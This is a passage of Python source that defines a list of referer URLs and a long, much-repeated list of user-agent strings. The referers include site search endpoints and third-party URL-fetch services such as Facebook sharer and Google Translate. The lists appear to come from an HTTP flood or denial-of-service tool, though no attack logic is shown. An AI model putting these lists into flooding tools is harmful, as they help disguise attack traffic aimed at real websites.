'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
'http://www.google.com/?q=', 'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
'https://drive.google.com/viewerng/viewer?url=', 'http://www.google.com/translate?u=',
'https://developers.google.com/speed/pagespeed/insights/?url=',
'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=',
'https://add.my.yahoo.com/rss?url=', 'https://play.google.com/store/search?q=',
'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=']
return referers
def obtain_user_agents(self):
user_agents = ['Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15',
'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
'Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4',
'Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
